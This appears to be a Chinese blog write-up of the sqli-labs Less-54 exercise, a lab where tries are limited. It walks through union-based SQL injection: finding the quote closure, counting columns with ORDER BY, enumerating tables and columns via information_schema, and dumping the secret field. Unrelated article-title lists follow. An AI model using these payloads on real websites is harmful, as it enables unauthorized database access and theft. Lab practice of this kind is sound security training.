当前位置:网站首页>SQL注入 Less54(限制次数的SQL注入+union注入)
SQL注入 Less54(限制次数的SQL注入+union注入)
2022-07-31 22:34:00 【华为云】
限制次数的SQL注入
每次reset,数据库的表名、字段名和数据都会发生改变
?id=1
?id=1'
发现没有报错信息
?id=1"
回显正常,直接排查双引号开头的闭合方式
?id=1'--+
?id=1')--+
?id=1'))--+
单引号回显正常,所以是单引号闭合
?id=1' order by 3--+
回显正常?id=1' order by 4--+
回显错误
所以有三列
?id=-1' union select 1,version(),database()--+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+
?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+
边栏推荐
- BM5 合并k个已排序的链表
- JS basic exercises
- Niuke.com brush questions (1)
- Fixed-length usage of nanopb string type based on RT1052 Aworks (27)
- BM5 merge k sorted linked lists
- 【Yugong Series】July 2022 Go Teaching Course 025-Recursive Function
- SQL27 View user details of different age groups
- Talking about the algorithm security of network security
- A solution to the server encountered an internal error that prevented it from fulfilling this request [easy to understand]
- Learn about C# anonymous methods
猜你喜欢
Financial profitability and solvency indicators
Unity-LineRenderer显示一条线
Qualcomm cDSP simple programming example (to query Qualcomm cDSP usage, signature), RK3588 npu usage query
The old music player WinAmp released version 5.9 RC1: migrated to VS 2019, completely rebuilt, compatible with Win11
Student management system on the first day: complete login PyQt5 + MySQL5.8 exit the operation logic
Architecture Battalion Module 8 Homework
[NLP] What is the memory of the model!
Quick Start Tutorial for flyway
登录业务实现(单点登录+微信扫码+短信服务)
NVIDIA has begun testing graphics products with AD106 and AD107 GPU cores
随机推荐
[QNX Hypervisor 2.2用户手册]9.16 system
"SDOI2016" Journey Problem Solution
基于RT1052 Aworks nanopb string 类型固定长度使用方式(二十七)
The old music player WinAmp released version 5.9 RC1: migrated to VS 2019, completely rebuilt, compatible with Win11
linux view redis version command (linux view mysql version number)
-xms -xmx(information value)
How to debug TestCafe
I don't know what to do with sync issues
[Open class preview]: Research and application of super-resolution technology in the field of video image quality enhancement
景区手绘地图的绘制流程
输入输出优化
Bika LIMS open source LIMS set - use of SENAITE (detection process)
Quick Start Tutorial for flyway
了解下C# 匿名方法
Summary of the classic drawing method of histogram
Golang must know the Go Mod command
IJCAI2022 | 代数和逻辑约束的混合概率推理
grep command written test questions
信息学奥赛一本通 1941:【07NOIP普及组】Hanoi双塔问题 | 洛谷 P1096 [NOIP2007 普及组] Hanoi 双塔问题
HTC using official firmware as bottom bag made ROM brush card bag tutorial